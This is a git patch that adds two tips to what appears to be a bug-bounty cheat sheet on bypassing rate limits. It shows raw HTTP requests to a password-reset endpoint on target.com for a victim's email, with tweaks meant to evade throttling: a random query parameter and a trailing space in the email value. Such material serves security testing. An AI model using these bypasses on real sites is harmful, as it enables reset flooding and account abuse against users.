From da84a9479b5b8997eb9f7b10ede7293b1b3c757a Mon Sep 17 00:00:00 2001
From: Muhammad Daffa <36522826+MD15@users.noreply.github.com>
Date: Sat, 19 Sep 2020 07:03:32 +0700
Subject: [PATCH] Bypass Rate Limit [2]

Add 2 tips
---
 BypassRateLimit.md | 34 ++++++++++++++++++++++++++++++++++
 1 file changed, 34 insertions(+)

diff --git a/BypassRateLimit.md b/BypassRateLimit.md
index 7f1806b..403963d 100644
--- a/BypassRateLimit.md
+++ b/BypassRateLimit.md
@@ -45,3 +45,37 @@ Cookie: aaaaaaaaaaaaa
 
 email=victim@gmail.com
 ```
+
+4. Add a random parameter on the last endpoint
+```
+POST /ForgotPass.php HTTP/1.1
+Host: target.com
+[...]
+
+email=victim@gmail.com
+```
+Try this to bypass
+```
+POST /ForgotPass.php?random HTTP/1.1
+Host: target.com
+[...]
+
+email=victim@gmail.com
+```
+
+5. Add space after the parameter value
+```
+POST /api/forgotpass HTTP/1.1
+Host: target.com
+[...]
+
+{"email":"victim@gmail.com"}
+```
+Try this to bypass
+```
+POST /api/forgotpass HTTP/1.1
+Host: target.com
+[...]
+
+{"email":"victim@gmail.com "}
+```